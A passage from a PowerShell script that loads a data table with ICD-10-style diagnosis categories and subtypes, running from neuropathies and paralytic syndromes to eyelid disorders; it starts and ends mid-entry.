mononeuropathies","Intercostal neuropathy") + $null = $DiagnosisList.Rows.Add("Other mononeuropathies","Mononeuritis multiplex") + $null = $DiagnosisList.Rows.Add("Other mononeuropathies","Other specified mononeuropathies") + $null = $DiagnosisList.Rows.Add("Other mononeuropathies","Mononeuropathy, unspecified") + $null = $DiagnosisList.Rows.Add("Mononeuropathy in diseases classified elsewhere","Mononeuropathy in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Hereditary and idiopathic neuropathy","Hereditary motor and sensory neuropathy") + $null = $DiagnosisList.Rows.Add("Hereditary and idiopathic neuropathy","Refsum's disease") + $null = $DiagnosisList.Rows.Add("Hereditary and idiopathic neuropathy","Neuropathy in association with hereditary ataxia") + $null = $DiagnosisList.Rows.Add("Hereditary and idiopathic neuropathy","Idiopathic progressive neuropathy") + $null = $DiagnosisList.Rows.Add("Hereditary and idiopathic neuropathy","Other hereditary and idiopathic neuropathies") + $null = $DiagnosisList.Rows.Add("Hereditary and idiopathic neuropathy","Hereditary and idiopathic neuropathy, unspecified") + $null = $DiagnosisList.Rows.Add("Inflammatory polyneuropathy","Guillain-Barre syndrome") + $null = $DiagnosisList.Rows.Add("Inflammatory polyneuropathy","Serum neuropathy") + $null = $DiagnosisList.Rows.Add("Other inflammatory polyneuropathies","Chronic inflammatory demyelinating polyneuritis") + $null = $DiagnosisList.Rows.Add("Other inflammatory polyneuropathies","Multifocal motor neuropathy") + $null = $DiagnosisList.Rows.Add("Other inflammatory polyneuropathies","Other inflammatory polyneuropathies") + $null = $DiagnosisList.Rows.Add("Inflammatory polyneuropathy, unspecified","Inflammatory polyneuropathy, unspecified") + $null = $DiagnosisList.Rows.Add("Other and unspecified polyneuropathies","Drug-induced polyneuropathy") + $null = $DiagnosisList.Rows.Add("Other and unspecified polyneuropathies","Alcoholic polyneuropathy") + $null = $DiagnosisList.Rows.Add("Other and unspecified polyneuropathies","Polyneuropathy due to other toxic agents") + $null = $DiagnosisList.Rows.Add("Other specified polyneuropathies","Critical illness polyneuropathy") + $null = $DiagnosisList.Rows.Add("Other specified polyneuropathies","Radiation-induced polyneuropathy") + $null = $DiagnosisList.Rows.Add("Other specified polyneuropathies","Other specified polyneuropathies") + $null = $DiagnosisList.Rows.Add("Polyneuropathy, unspecified","Polyneuropathy, unspecified") + $null = $DiagnosisList.Rows.Add("Polyneuropathy in diseases classified elsewhere","Polyneuropathy in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Other disorders of peripheral nervous system","Other disorders of peripheral nervous system") + $null = $DiagnosisList.Rows.Add("Sequelae of inflammatory and toxic polyneuropathies","Sequelae of Guillain-Barre syndrome") + $null = $DiagnosisList.Rows.Add("Sequelae of inflammatory and toxic polyneuropathies","Sequelae of other inflammatory polyneuropathy") + $null = $DiagnosisList.Rows.Add("Sequelae of inflammatory and toxic polyneuropathies","Sequelae of toxic polyneuropathy") + $null = $DiagnosisList.Rows.Add("Myasthenia gravis","Myasthenia gravis without (acute) exacerbation") + $null = $DiagnosisList.Rows.Add("Myasthenia gravis","Myasthenia gravis with (acute) exacerbation") + $null = $DiagnosisList.Rows.Add("Toxic myoneural disorders","Toxic myoneural disorders") + $null = $DiagnosisList.Rows.Add("Congenital and developmental myasthenia","Congenital and developmental myasthenia") + $null = $DiagnosisList.Rows.Add("Other specified myoneural disorders","Lambert-Eaton syndrome, unspecified") + $null = $DiagnosisList.Rows.Add("Other specified myoneural disorders","Lambert-Eaton syndrome in disease classified elsewhere") + $null = $DiagnosisList.Rows.Add("Other specified myoneural disorders","Other specified myoneural disorders") + $null = $DiagnosisList.Rows.Add("Myoneural disorder, unspecified","Myoneural disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Primary disorders of muscles","Muscular dystrophy") + $null = $DiagnosisList.Rows.Add("Myotonic disorders","Myotonic muscular dystrophy") + $null = $DiagnosisList.Rows.Add("Myotonic disorders","Myotonia congenita") + $null = $DiagnosisList.Rows.Add("Myotonic disorders","Myotonic chondrodystrophy") + $null = $DiagnosisList.Rows.Add("Myotonic disorders","Drug induced myotonia") + $null = $DiagnosisList.Rows.Add("Myotonic disorders","Other specified myotonic disorders") + $null = $DiagnosisList.Rows.Add("Congenital myopathies","Congenital myopathies") + $null = $DiagnosisList.Rows.Add("Mitochondrial myopathy, not elsewhere classified","Mitochondrial myopathy, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other primary disorders of muscles","Other primary disorders of muscles") + $null = $DiagnosisList.Rows.Add("Primary disorder of muscle, unspecified","Primary disorder of muscle, unspecified") + $null = $DiagnosisList.Rows.Add("Other and unspecified myopathies","Drug-induced myopathy") + $null = $DiagnosisList.Rows.Add("Other and unspecified myopathies","Alcoholic myopathy") + $null = $DiagnosisList.Rows.Add("Other and unspecified myopathies","Myopathy due to other toxic agents") + $null = $DiagnosisList.Rows.Add("Other and unspecified myopathies","Periodic paralysis") + $null = $DiagnosisList.Rows.Add("Inflammatory and immune myopathies, not elsewhere classified","Inclusion body myositis [IBM]") + $null = $DiagnosisList.Rows.Add("Inflammatory and immune myopathies, not elsewhere classified","Other inflammatory and immune myopathies, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other specified myopathies","Critical illness myopathy") + $null = $DiagnosisList.Rows.Add("Other specified myopathies","Other specified myopathies") + $null = $DiagnosisList.Rows.Add("Myopathy, unspecified","Myopathy, unspecified") + $null = $DiagnosisList.Rows.Add("Disorders of myoneural junction and muscle in diseases classified elsewhere","Lambert-Eaton syndrome in neoplastic disease") + $null = $DiagnosisList.Rows.Add("Disorders of myoneural junction and muscle in diseases classified elsewhere","Myasthenic syndromes in other diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Disorders of myoneural junction and muscle in diseases classified elsewhere","Myopathy in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Cerebral palsy","Spastic quadriplegic cerebral palsy") + $null = $DiagnosisList.Rows.Add("Cerebral palsy","Spastic diplegic cerebral palsy") + $null = $DiagnosisList.Rows.Add("Cerebral palsy","Spastic hemiplegic cerebral palsy") + $null = $DiagnosisList.Rows.Add("Cerebral palsy","Athetoid cerebral palsy") + $null = $DiagnosisList.Rows.Add("Cerebral palsy","Ataxic cerebral palsy") + $null = $DiagnosisList.Rows.Add("Cerebral palsy","Other cerebral palsy") + $null = $DiagnosisList.Rows.Add("Cerebral palsy","Cerebral palsy, unspecified") + $null = $DiagnosisList.Rows.Add("Flaccid hemiplegia","Flaccid hemiplegia affecting unspecified side") + $null = $DiagnosisList.Rows.Add("Flaccid hemiplegia","Flaccid hemiplegia affecting right dominant side") + $null = $DiagnosisList.Rows.Add("Flaccid hemiplegia","Flaccid hemiplegia affecting left dominant side") + $null = $DiagnosisList.Rows.Add("Flaccid hemiplegia","Flaccid hemiplegia affecting right nondominant side") + $null = $DiagnosisList.Rows.Add("Flaccid hemiplegia","Flaccid hemiplegia affecting left nondominant side") + $null = $DiagnosisList.Rows.Add("Spastic hemiplegia","Spastic hemiplegia affecting unspecified side") + $null = $DiagnosisList.Rows.Add("Spastic hemiplegia","Spastic hemiplegia affecting right dominant side") + $null = $DiagnosisList.Rows.Add("Spastic hemiplegia","Spastic hemiplegia affecting left dominant side") + $null = $DiagnosisList.Rows.Add("Spastic hemiplegia","Spastic hemiplegia affecting right nondominant side") + $null = $DiagnosisList.Rows.Add("Spastic hemiplegia","Spastic hemiplegia affecting left nondominant side") + $null = $DiagnosisList.Rows.Add("Hemiplegia, unspecified","Hemiplegia, unspecified affecting unspecified side") + $null = $DiagnosisList.Rows.Add("Hemiplegia, unspecified","Hemiplegia, unspecified affecting right dominant side") + $null = $DiagnosisList.Rows.Add("Hemiplegia, unspecified","Hemiplegia, unspecified affecting left dominant side") + $null = $DiagnosisList.Rows.Add("Hemiplegia, unspecified","Hemiplegia, unspecified affecting right nondominant side") + $null = $DiagnosisList.Rows.Add("Hemiplegia, unspecified","Hemiplegia, unspecified affecting left nondominant side") + $null = $DiagnosisList.Rows.Add("Paraplegia","Paraplegia, unspecified") + $null = $DiagnosisList.Rows.Add("Paraplegia","Paraplegia, complete") + $null = $DiagnosisList.Rows.Add("Paraplegia","Paraplegia, incomplete") + $null = $DiagnosisList.Rows.Add("Quadriplegia","Quadriplegia, unspecified") + $null = $DiagnosisList.Rows.Add("Quadriplegia","Quadriplegia, C1-C4 complete") + $null = $DiagnosisList.Rows.Add("Quadriplegia","Quadriplegia, C1-C4 incomplete") + $null = $DiagnosisList.Rows.Add("Quadriplegia","Quadriplegia, C5-C7 complete") + $null = $DiagnosisList.Rows.Add("Quadriplegia","Quadriplegia, C5-C7 incomplete") + $null = $DiagnosisList.Rows.Add("Other paralytic syndromes","Diplegia of upper limbs") + $null = $DiagnosisList.Rows.Add("Monoplegia of lower limb","Monoplegia of lower limb affecting unspecified side") + $null = $DiagnosisList.Rows.Add("Monoplegia of lower limb","Monoplegia of lower limb affecting right dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of lower limb","Monoplegia of lower limb affecting left dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of lower limb","Monoplegia of lower limb affecting right nondominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of lower limb","Monoplegia of lower limb affecting left nondominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of upper limb","Monoplegia of upper limb affecting unspecified side") + $null = $DiagnosisList.Rows.Add("Monoplegia of upper limb","Monoplegia of upper limb affecting right dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of upper limb","Monoplegia of upper limb affecting left dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of upper limb","Monoplegia of upper limb affecting right nondominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia of upper limb","Monoplegia of upper limb affecting left nondominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia, unspecified","Monoplegia, unspecified affecting unspecified side") + $null = $DiagnosisList.Rows.Add("Monoplegia, unspecified","Monoplegia, unspecified affecting right dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia, unspecified","Monoplegia, unspecified affecting left dominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia, unspecified","Monoplegia, unspecified affecting right nondominant side") + $null = $DiagnosisList.Rows.Add("Monoplegia, unspecified","Monoplegia, unspecified affecting left nondominant side") + $null = $DiagnosisList.Rows.Add("Cauda equina syndrome","Cauda equina syndrome") + $null = $DiagnosisList.Rows.Add("Locked-in state","Locked-in state") + $null = $DiagnosisList.Rows.Add("Other specified paralytic syndromes","Brown-Sequard syndrome") + $null = $DiagnosisList.Rows.Add("Other specified paralytic syndromes","Anterior cord syndrome") + $null = $DiagnosisList.Rows.Add("Other specified paralytic syndromes","Posterior cord syndrome") + $null = $DiagnosisList.Rows.Add("Other specified paralytic syndromes","Todd's paralysis (postepileptic)") + $null = $DiagnosisList.Rows.Add("Other specified paralytic syndromes","Other specified paralytic syndromes") + $null = $DiagnosisList.Rows.Add("Paralytic syndrome, unspecified","Paralytic syndrome, unspecified") + $null = $DiagnosisList.Rows.Add("Pain, not elsewhere classified","Central pain syndrome") + $null = $DiagnosisList.Rows.Add("Acute pain, not elsewhere classified","Acute pain due to trauma") + $null = $DiagnosisList.Rows.Add("Acute pain, not elsewhere classified","Acute post-thoracotomy pain") + $null = $DiagnosisList.Rows.Add("Acute pain, not elsewhere classified","Other acute postprocedural pain") + $null = $DiagnosisList.Rows.Add("Chronic pain, not elsewhere classified","Chronic pain due to trauma") + $null = $DiagnosisList.Rows.Add("Chronic pain, not elsewhere classified","Chronic post-thoracotomy pain") + $null = $DiagnosisList.Rows.Add("Chronic pain, not elsewhere classified","Other chronic postprocedural pain") + $null = $DiagnosisList.Rows.Add("Chronic pain, not elsewhere classified","Other chronic pain") + $null = $DiagnosisList.Rows.Add("Neoplasm related pain (acute) (chronic)","Neoplasm related pain (acute) (chronic)") + $null = $DiagnosisList.Rows.Add("Chronic pain syndrome","Chronic pain syndrome") + $null = $DiagnosisList.Rows.Add("Idiopathic peripheral autonomic neuropathy","Carotid sinus syncope") + $null = $DiagnosisList.Rows.Add("Idiopathic peripheral autonomic neuropathy","Other idiopathic peripheral autonomic neuropathy") + $null = $DiagnosisList.Rows.Add("Familial dysautonomia [Riley-Day]","Familial dysautonomia [Riley-Day]") + $null = $DiagnosisList.Rows.Add("Horner's syndrome","Horner's syndrome") + $null = $DiagnosisList.Rows.Add("Multi-system degeneration of the autonomic nervous system","Multi-system degeneration of the autonomic nervous system") + $null = $DiagnosisList.Rows.Add("Autonomic dysreflexia","Autonomic dysreflexia") + $null = $DiagnosisList.Rows.Add("Complex regional pain syndrome I (CRPS I)","Complex regional pain syndrome I, unspecified") + $null = $DiagnosisList.Rows.Add("Complex regional pain syndrome I of upper limb","Complex regional pain syndrome I of right upper limb") + $null = $DiagnosisList.Rows.Add("Complex regional pain syndrome I of upper limb","Complex regional pain syndrome I of left upper limb") + $null = $DiagnosisList.Rows.Add("Complex regional pain syndrome I of upper limb","Complex regional pain syndrome I of upper limb, bilateral") + $null = $DiagnosisList.Rows.Add("Complex regional pain syndrome I of upper limb","Complex regional pain syndrome I of unspecified upper limb") + $null = $DiagnosisList.Rows.Add("Complex regional pain syndrome I of lower limb","Complex regional pain syndrome I of right lower limb") + $null = $DiagnosisList.Rows.Add("Complex regional pain syndrome I of lower limb","Complex regional pain syndrome I of left lower limb") + $null = $DiagnosisList.Rows.Add("Complex regional pain syndrome I of lower limb","Complex regional pain syndrome I of lower limb, bilateral") + $null = $DiagnosisList.Rows.Add("Complex regional pain syndrome I of lower limb","Complex regional pain syndrome I of unspecified lower limb") + $null = $DiagnosisList.Rows.Add("Complex regional pain syndrome I of other specified site","Complex regional pain syndrome I of other specified site") + $null = $DiagnosisList.Rows.Add("Other disorders of autonomic nervous system","Other disorders of autonomic nervous system") + $null = $DiagnosisList.Rows.Add("Disorder of the autonomic nervous system, unspecified","Disorder of the autonomic nervous system, unspecified") + $null = $DiagnosisList.Rows.Add("Hydrocephalus","Communicating hydrocephalus") + $null = $DiagnosisList.Rows.Add("Hydrocephalus","Obstructive hydrocephalus") + $null = $DiagnosisList.Rows.Add("Hydrocephalus","(Idiopathic) normal pressure hydrocephalus") + $null = $DiagnosisList.Rows.Add("Hydrocephalus","Post-traumatic hydrocephalus, unspecified") + $null = $DiagnosisList.Rows.Add("Hydrocephalus","Hydrocephalus in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Hydrocephalus","Other hydrocephalus") + $null = $DiagnosisList.Rows.Add("Hydrocephalus","Hydrocephalus, unspecified") + $null = $DiagnosisList.Rows.Add("Toxic encephalopathy","Toxic encephalopathy") + $null = $DiagnosisList.Rows.Add("Other disorders of brain","Cerebral cysts") + $null = $DiagnosisList.Rows.Add("Other disorders of brain","Anoxic brain damage, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other disorders of brain","Benign intracranial hypertension") + $null = $DiagnosisList.Rows.Add("Other disorders of brain","Postviral fatigue syndrome") + $null = $DiagnosisList.Rows.Add("Other and unspecified encephalopathy","Encephalopathy, unspecified") + $null = $DiagnosisList.Rows.Add("Other and unspecified encephalopathy","Metabolic encephalopathy") + $null = $DiagnosisList.Rows.Add("Other and unspecified encephalopathy","Other encephalopathy") + $null = $DiagnosisList.Rows.Add("Compression of brain","Compression of brain") + $null = $DiagnosisList.Rows.Add("Cerebral edema","Cerebral edema") + $null = $DiagnosisList.Rows.Add("Reye's syndrome","Reye's syndrome") + $null = $DiagnosisList.Rows.Add("Other specified disorders of brain","Temporal sclerosis") + $null = $DiagnosisList.Rows.Add("Other specified disorders of brain","Brain death") + $null = $DiagnosisList.Rows.Add("Other specified disorders of brain","Other specified disorders of brain") + $null = $DiagnosisList.Rows.Add("Disorder of brain, unspecified","Disorder of brain, unspecified") + $null = $DiagnosisList.Rows.Add("Other disorders of brain in diseases classified elsewhere","Other disorders of brain in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Other and unspecified diseases of spinal cord","Syringomyelia and syringobulbia") + $null = $DiagnosisList.Rows.Add("Vascular myelopathies","Acute infarction of spinal cord (embolic) (nonembolic)") + $null = $DiagnosisList.Rows.Add("Vascular myelopathies","Other vascular myelopathies") + $null = $DiagnosisList.Rows.Add("Other and unspecified cord compression","Unspecified cord compression") + $null = $DiagnosisList.Rows.Add("Other and unspecified cord compression","Other cord compression") + $null = $DiagnosisList.Rows.Add("Other specified diseases of spinal cord","Conus medullaris syndrome") + $null = $DiagnosisList.Rows.Add("Other specified diseases of spinal cord","Other specified diseases of spinal cord") + $null = $DiagnosisList.Rows.Add("Disease of spinal cord, unspecified","Disease of spinal cord, unspecified") + $null = $DiagnosisList.Rows.Add("Other disorders of central nervous system","Cerebrospinal fluid leak") + $null = $DiagnosisList.Rows.Add("Disorders of meninges, not elsewhere classified","Dural tear") + $null = $DiagnosisList.Rows.Add("Disorders of meninges, not elsewhere classified","Meningeal adhesions (cerebral) (spinal)") + $null = $DiagnosisList.Rows.Add("Disorders of meninges, not elsewhere classified","Other disorders of meninges, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other specified disorders of central nervous system","Other specified disorders of central nervous system") + $null = $DiagnosisList.Rows.Add("Disorder of central nervous system, unspecified","Disorder of central nervous system, unspecified") + $null = $DiagnosisList.Rows.Add("Intraoperative and postprocedural complications and disorders of nervous system, not elsewhere classified","Cerebrospinal fluid leak from spinal puncture") + $null = $DiagnosisList.Rows.Add("Intraoperative and postprocedural complications and disorders of nervous system, not elsewhere classified","Other reaction to spinal and lumbar puncture") + $null = $DiagnosisList.Rows.Add("Intraoperative and postprocedural complications and disorders of nervous system, not elsewhere classified","Intracranial hypotension following ventricular shunting") + $null = $DiagnosisList.Rows.Add("Intraoperative hemorrhage and hematoma of a nervous system organ or structure complicating a procedure","Intraoperative hemorrhage and hematoma of a nervous system organ or structure complicating a nervous system procedure") + $null = $DiagnosisList.Rows.Add("Intraoperative hemorrhage and hematoma of a nervous system organ or structure complicating a procedure","Intraoperative hemorrhage and hematoma of a nervous system organ or structure complicating other procedure") + $null = $DiagnosisList.Rows.Add("Accidental puncture and laceration of a nervous system organ or structure during a procedure","Accidental puncture or laceration of dura during a procedure") + $null = $DiagnosisList.Rows.Add("Accidental puncture and laceration of a nervous system organ or structure during a procedure","Accidental puncture and laceration of other nervous system organ or structure during a nervous system procedure") + $null = $DiagnosisList.Rows.Add("Accidental puncture and laceration of a nervous system organ or structure during a procedure","Accidental puncture and laceration of other nervous system organ or structure during other procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hemorrhage of a nervous system organ or structure following a procedure","Postprocedural hemorrhage of a nervous system organ or structure following a nervous system procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hemorrhage of a nervous system organ or structure following a procedure","Postprocedural hemorrhage of a nervous system organ or structure following other procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma and seroma of a nervous system organ or structure following a procedure","Postprocedural hematoma of a nervous system organ or structure following a nervous system procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma and seroma of a nervous system organ or structure following a procedure","Postprocedural hematoma of a nervous system organ or structure following other procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma and seroma of a nervous system organ or structure following a procedure","Postprocedural seroma of a nervous system organ or structure following a nervous system procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma and seroma of a nervous system organ or structure following a procedure","Postprocedural seroma of a nervous system organ or structure following other procedure") + $null = $DiagnosisList.Rows.Add("Other intraoperative and postprocedural complications and disorders of nervous system","Other intraoperative complications of nervous system") + $null = $DiagnosisList.Rows.Add("Other intraoperative and postprocedural complications and disorders of nervous system","Other postprocedural complications and disorders of nervous system") + $null = $DiagnosisList.Rows.Add("Other disorders of nervous system not elsewhere classified","Neurogenic arthritis, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other disorders of nervous system not elsewhere classified","Other disorders of nervous system") + $null = $DiagnosisList.Rows.Add("Other disorders of nervous system in diseases classified elsewhere","Autonomic neuropathy in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Other disorders of nervous system in diseases classified elsewhere","Myelopathy in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Other disorders of nervous system in diseases classified elsewhere","Other specified disorders of nervous system in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Hordeolum externum","Hordeolum externum right upper eyelid") + $null = $DiagnosisList.Rows.Add("Hordeolum externum","Hordeolum externum right lower eyelid") + $null = $DiagnosisList.Rows.Add("Hordeolum externum","Hordeolum externum right eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Hordeolum externum","Hordeolum externum left upper eyelid") + $null = $DiagnosisList.Rows.Add("Hordeolum externum","Hordeolum externum left lower eyelid") + $null = $DiagnosisList.Rows.Add("Hordeolum externum","Hordeolum externum left eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Hordeolum externum","Hordeolum externum unspecified eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Hordeolum internum","Hordeolum internum right upper eyelid") + $null = $DiagnosisList.Rows.Add("Hordeolum internum","Hordeolum internum right lower eyelid") + $null = $DiagnosisList.Rows.Add("Hordeolum internum","Hordeolum internum right eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Hordeolum internum","Hordeolum internum left upper eyelid") + $null = $DiagnosisList.Rows.Add("Hordeolum internum","Hordeolum internum left lower eyelid") + $null = $DiagnosisList.Rows.Add("Hordeolum internum","Hordeolum internum left eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Hordeolum internum","Hordeolum internum unspecified eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Abscess of eyelid","Abscess of right upper eyelid") + $null = $DiagnosisList.Rows.Add("Abscess of eyelid","Abscess of right lower eyelid") + $null = $DiagnosisList.Rows.Add("Abscess of eyelid","Abscess of eyelid right eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Abscess of eyelid","Abscess of left upper eyelid") + $null = $DiagnosisList.Rows.Add("Abscess of eyelid","Abscess of left lower eyelid") + $null = $DiagnosisList.Rows.Add("Abscess of eyelid","Abscess of eyelid left eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Abscess of eyelid","Abscess of eyelid unspecified eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Chalazion","Chalazion right upper eyelid") + $null = $DiagnosisList.Rows.Add("Chalazion","Chalazion right lower eyelid") + $null = $DiagnosisList.Rows.Add("Chalazion","Chalazion right eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Chalazion","Chalazion left upper eyelid") + $null = $DiagnosisList.Rows.Add("Chalazion","Chalazion left lower eyelid") + $null = $DiagnosisList.Rows.Add("Chalazion","Chalazion left eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Chalazion","Chalazion unspecified eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Unspecified blepharitis","Unspecified blepharitis right upper eyelid") + $null = $DiagnosisList.Rows.Add("Unspecified blepharitis","Unspecified blepharitis right lower eyelid") + $null = $DiagnosisList.Rows.Add("Unspecified blepharitis","Unspecified blepharitis right eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Unspecified blepharitis","Unspecified blepharitis left upper eyelid") + $null = $DiagnosisList.Rows.Add("Unspecified blepharitis","Unspecified blepharitis left lower eyelid") + $null = $DiagnosisList.Rows.Add("Unspecified blepharitis","Unspecified blepharitis left eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Unspecified blepharitis","Unspecified blepharitis unspecified eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Ulcerative blepharitis","Ulcerative blepharitis right upper eyelid") + $null = $DiagnosisList.Rows.Add("Ulcerative blepharitis","Ulcerative blepharitis right lower eyelid") + $null = $DiagnosisList.Rows.Add("Ulcerative blepharitis","Ulcerative blepharitis right eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Ulcerative blepharitis","Ulcerative blepharitis left upper eyelid") + $null = $DiagnosisList.Rows.Add("Ulcerative blepharitis","Ulcerative blepharitis left lower eyelid") + $null = $DiagnosisList.Rows.Add("Ulcerative blepharitis","Ulcerative blepharitis left eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Ulcerative blepharitis","Ulcerative blepharitis unspecified eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Squamous blepharitis","Squamous blepharitis right upper eyelid") + $null = $DiagnosisList.Rows.Add("Squamous blepharitis","Squamous blepharitis right lower eyelid") + $null = $DiagnosisList.Rows.Add("Squamous blepharitis","Squamous blepharitis right eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Squamous blepharitis","Squamous blepharitis left upper eyelid") + $null = $DiagnosisList.Rows.Add("Squamous blepharitis","Squamous blepharitis left lower eyelid") + $null = $DiagnosisList.Rows.Add("Squamous blepharitis","Squamous blepharitis left eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Squamous blepharitis","Squamous blepharitis unspecified eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Allergic dermatitis of eyelid","Allergic dermatitis of right upper eyelid") + $null = $DiagnosisList.Rows.Add("Allergic dermatitis of eyelid","Allergic dermatitis of right lower eyelid") + $null = $DiagnosisList.Rows.Add("Allergic dermatitis of eyelid","Allergic dermatitis of right eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Allergic dermatitis of eyelid","Allergic dermatitis of left upper eyelid") + $null = $DiagnosisList.Rows.Add("Allergic dermatitis of eyelid","Allergic dermatitis of left lower eyelid") + $null = $DiagnosisList.Rows.Add("Allergic dermatitis of eyelid","Allergic dermatitis of left eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Allergic dermatitis of eyelid","Allergic dermatitis of unspecified eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Discoid lupus erythematosus of eyelid","Discoid lupus erythematosus of right upper eyelid") + $null = $DiagnosisList.Rows.Add("Discoid lupus erythematosus of eyelid","Discoid lupus erythematosus of right lower eyelid") + $null = $DiagnosisList.Rows.Add("Discoid lupus erythematosus of eyelid","Discoid lupus erythematosus of right eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Discoid lupus erythematosus of eyelid","Discoid lupus erythematosus of left upper eyelid") + $null = $DiagnosisList.Rows.Add("Discoid lupus erythematosus of eyelid","Discoid lupus erythematosus of left lower eyelid") + $null = $DiagnosisList.Rows.Add("Discoid lupus erythematosus of eyelid","Discoid lupus erythematosus of left eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Discoid lupus erythematosus of eyelid","Discoid lupus erythematosus of unspecified eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Eczematous dermatitis of eyelid","Eczematous dermatitis of right upper eyelid") + $null = $DiagnosisList.Rows.Add("Eczematous dermatitis of eyelid","Eczematous dermatitis of right lower eyelid") + $null = $DiagnosisList.Rows.Add("Eczematous dermatitis of eyelid","Eczematous dermatitis of right eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Eczematous dermatitis of eyelid","Eczematous dermatitis of left upper eyelid") + $null = $DiagnosisList.Rows.Add("Eczematous dermatitis of eyelid","Eczematous dermatitis of left lower eyelid") + $null = $DiagnosisList.Rows.Add("Eczematous dermatitis of eyelid","Eczematous dermatitis of left eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Eczematous dermatitis of eyelid","Eczematous dermatitis of unspecified eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Xeroderma of eyelid","Xeroderma of right upper eyelid") + $null = $DiagnosisList.Rows.Add("Xeroderma of eyelid","Xeroderma of right lower eyelid") + $null = $DiagnosisList.Rows.Add("Xeroderma of eyelid","Xeroderma of right eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Xeroderma of eyelid","Xeroderma of left upper eyelid") + $null = $DiagnosisList.Rows.Add("Xeroderma of eyelid","Xeroderma of left lower eyelid") + $null = $DiagnosisList.Rows.Add("Xeroderma of eyelid","Xeroderma of left eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Xeroderma of eyelid","Xeroderma of unspecified eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Other specified inflammations of eyelid","Other specified inflammations of eyelid") + $null = $DiagnosisList.Rows.Add("Unspecified inflammation of eyelid","Unspecified inflammation of eyelid") + $null = $DiagnosisList.Rows.Add("Unspecified entropion of eyelid","Unspecified entropion of right upper eyelid") + $null = $DiagnosisList.Rows.Add("Unspecified entropion of eyelid","Unspecified entropion of right lower eyelid") + $null = $DiagnosisList.Rows.Add("Unspecified entropion of eyelid","Unspecified entropion of right eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Unspecified entropion of eyelid","Unspecified entropion of left upper eyelid") + $null = $DiagnosisList.Rows.Add("Unspecified entropion of eyelid","Unspecified entropion of left lower eyelid") + $null = $DiagnosisList.Rows.Add("Unspecified entropion of eyelid","Unspecified entropion of left eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Unspecified entropion of eyelid","Unspecified entropion of unspecified eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Cicatricial entropion of eyelid","Cicatricial entropion of right upper eyelid") + $null = $DiagnosisList.Rows.Add("Cicatricial entropion of eyelid","Cicatricial entropion of right lower eyelid") + $null = $DiagnosisList.Rows.Add("Cicatricial entropion of eyelid","Cicatricial entropion of right eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Cicatricial entropion of eyelid","Cicatricial entropion of left upper eyelid") + $null = $DiagnosisList.Rows.Add("Cicatricial entropion of eyelid","Cicatricial entropion of left lower eyelid") + $null = $DiagnosisList.Rows.Add("Cicatricial entropion of eyelid","Cicatricial entropion of left eye, unspecified eyelid") + $null = $DiagnosisList.Rows.Add("Cicatricial entropion of eyelid","Cicatricial entropion of unspecified 